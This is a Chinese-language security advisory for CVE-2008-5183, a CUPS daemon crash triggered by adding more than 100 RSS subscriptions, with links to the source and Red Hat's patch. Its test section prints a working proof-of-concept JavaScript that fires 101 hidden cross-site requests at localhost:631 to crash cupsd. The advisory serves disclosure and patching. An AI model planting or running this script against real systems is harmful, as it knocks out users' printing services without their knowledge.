发布日期：2008-11-21
更新日期：2008-12-22

受影响系统：

Easy Software Products CUPS < 1.3.8

不受影响系统：

Easy Software Products CUPS 1.3.8

描述：

---

BUGTRAQ  ID: 32419
CVE(CAN) ID: CVE-2008-5183

Common Unix Printing System（CUPS）是一款通用Unix打印系统，是Unix环境下的跨平台打印解决方案，基于Internet打印协议，提供大多数PostScript和raster打印机服务。

如果向默认监听于631/tcp端口的CUPS守护程序（/usr/sbin/cupsd）添加了多于100个RSS订阅的话，就会触发空指针引用，导致守护程序崩溃。

<*来源：Adrian Pastor （m123303@richmond.ac.uk）
  
  链接：http://www.gnucitizen.org/blog/pwning-ubuntu-via-cups/
        https://www.redhat.com/support/errata/RHSA-2008-1029.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<script>
// make 101 CSRFed requests to CUPS daemon via &apos;img&apos; tags
// causes CUPS daemon to crash
// by Adrian &apos;pagvac&apos; Pastor | GNUCITIZEN.org

for(var i=1;i<=101;++i) {
    document.write("<img width=0 height=0 " +
        "src=\"http://localhost:631/admin/?OP=add-rss-subscription&SUBSCRIPTION_NAME=DOS_TEST_" +
        i + "&PRINTER_URI=%23ALL%23&EVENT_JOB_CREATED=on&MAX_EVENTS=20\">");
}
</script>

建议：

---

厂商补丁：

RedHat
------
RedHat已经为此发布了一个安全公告（RHSA-2008:1029-01）以及相应补丁:
RHSA-2008:1029-01：Moderate: cups security update
链接：https://www.redhat.com/support/errata/RHSA-2008-1029.html

浏览次数：2543
严重程度：0（网友投票）